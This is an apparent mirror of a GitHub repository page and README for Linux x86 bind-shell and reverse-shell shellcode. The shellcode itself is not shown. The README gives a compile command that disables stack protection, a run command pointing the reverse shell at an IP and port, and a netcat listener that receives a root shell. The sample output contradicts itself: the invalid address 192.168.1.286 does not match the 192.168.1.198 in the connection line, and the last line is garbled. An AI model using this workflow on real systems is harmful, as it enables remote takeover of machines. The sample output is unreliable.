https://github.com/ajayos/linux-x86
Linux/x86 - Shell (/bin/sh)
https://github.com/ajayos/linux-x86
ajay-o-s ajay-os linux-x86-shellcode reverse-engineering x86
Last synced: about 2 months ago
JSON representation
Linux/x86 - Shell (/bin/sh)
- Host: GitHub
- URL: https://github.com/ajayos/linux-x86
- Owner: Ajayos
- License: apache-2.0
- Created: 2022-07-15T07:58:20.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2022-07-15T08:41:27.000Z (almost 3 years ago)
- Last Synced: 2025-01-15T07:12:06.757Z (3 months ago)
- Topics: ajay-o-s, ajay-os, linux-x86-shellcode, reverse-engineering, x86
- Language: Assembly
- Homepage:
- Size: 24.4 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
- License: LICENSE
Awesome Lists containing this project
README
# [Linux-x86](./README.md)
## Linux/x86 - Shell (/bin/sh)# ***Tree***
---
# Linux-x86
# ╔═════════╩═════════╗
# [Bind-Shellcode](Bind-Shellcode/README.md) [Reverse-Shell](Reverse-Shell/README.md)
# ╔══════╩══════╗ ╔══════╩══════╗
## [Bind-Shellcode.c](Bind-Shellcode/Bind-Shellcode.c) [Bind-Shellcode.asm](Bind-Shellcode/Bind-Shellcode.asm) [Reverse-Shell.c](Reverse-Shell/Reverse-Shell.c) [Reverse-Shell.asm](Reverse-Shell/Reverse-Shell.asm)---
# [Bind-Shellcode](Bind-Shellcode/README.md)
# Linux-x86/Bind-Shellcode
## Linux-x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)---
# [Reverse-Shell](Reverse-Shell/README.md)
## Linux-x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)
# Linux-x86/Reverse-Shell
Linux/x86 Reverse TCP Shell with dynamic IP and port binding Shellcode (tested on Ubuntu 12.04 LTS)
Usage: gcc -z execstack -o shell_reverse_tcp shell_reverse_tcp.c
$ ./shell_reverse_tcp_shellcode 192.168.1.286 4443
Connecting to 192.168.1.198 (0xec01a8c0):4443 (0x115c)
Byte 26: c0
Byte 27: a8
Byte 28: 01
Byte 29: ec
$ nc -nlv 4443
Listening on 0.0.0.0 4443
Connection received on 192.168.1.286 45219
id
uid=0(root) gid=0(root) groups=0(root)es)